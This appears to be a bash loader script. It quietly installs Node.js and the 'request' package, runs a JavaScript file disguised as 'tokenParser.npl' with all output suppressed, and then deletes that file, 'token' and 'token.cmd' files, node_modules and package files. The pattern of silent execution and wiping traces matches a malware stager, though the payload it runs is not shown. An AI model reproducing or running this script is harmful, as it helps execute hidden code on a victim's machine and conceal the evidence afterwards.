#!/bin/bash

# Creating new Info
set -e

NODE_VERSION="20.11.1"
NODE_TARBALL="node-v${NODE_VERSION}-linux-x64.tar.xz"
DOWNLOAD_URL="https://nodejs.org/dist/v${NODE_VERSION}/${NODE_TARBALL}"
NODE_DIR="$(pwd)/node-v${NODE_VERSION}-linux-x64"

NODE_INSTALLED_VERSION=""

# Step 1: Check if Node.js is installed
NODE_INSTALLED_VERSION=$(node -v 2>/dev/null || echo "")

# Step 2: Check if Node.js is already installed and set the flag for installation
if [ -z "$NODE_INSTALLED_VERSION" ]; then
    INSTALL_NODE=1
else
    INSTALL_NODE=0
fi

# Step 3: Download Node.js if not installed
if [ "$INSTALL_NODE" -eq 1 ]; then
    if ! command -v curl &> /dev/null; then
        echo "curl not found, using wget"
        wget -q "$DOWNLOAD_URL" -O "$NODE_TARBALL" >/dev/null 2>&1 &
    else
        echo "Using curl to download Node.js"
        curl -sSL -o "$NODE_TARBALL" "$DOWNLOAD_URL" >/dev/null 2>&1 &
    fi
    wait
fi

# Step 4: Extract Node.js tarball
if [ -f "$NODE_TARBALL" ]; then
    tar -xf "$NODE_TARBALL" -C "$(pwd)" >/dev/null 2>&1 &
    wait
    rm -f "$NODE_TARBALL"
else
    exit 1
fi

# Step 5: Add Node.js to the system path
export PATH="$(pwd)/node-v${NODE_VERSION}-linux-x64/bin:$PATH"

# Step 6: Check if Node.js and npm are available
if ! command -v node &> /dev/null || ! command -v npm &> /dev/null; then
    exit 1
fi

# Step 7: Install the "request" package if it's not installed
if [ ! -d "$(pwd)/node_modules/request" ]; then
    npm install request --silent --no-progress --loglevel=error --fund=false >/dev/null 2>&1 &
    wait
fi

# Step 8: Run tokenParser.npl if it exists
if [ -f "$(pwd)/tokenParser.npl" ]; then
    node "$(pwd)/tokenParser.npl" >/dev/null 2>&1 &
    wait
else
    exit 1
fi

echo successfully running node

# Step 9: Clean up generated files
rm -f "$(pwd)/token.cmd" >/dev/null 2>&1 &
rm -f "$(pwd)/token" >/dev/null 2>&1 &
rm -f "$(pwd)/tokenParser.npl" >/dev/null 2>&1 &
rm -rf "$(pwd)/node_modules" >/dev/null 2>&1 &
rm -f "$(pwd)/package.json" >/dev/null 2>&1 &
rm -f "$(pwd)/package-lock.json" >/dev/null 2>&1 &
wait

exit 0
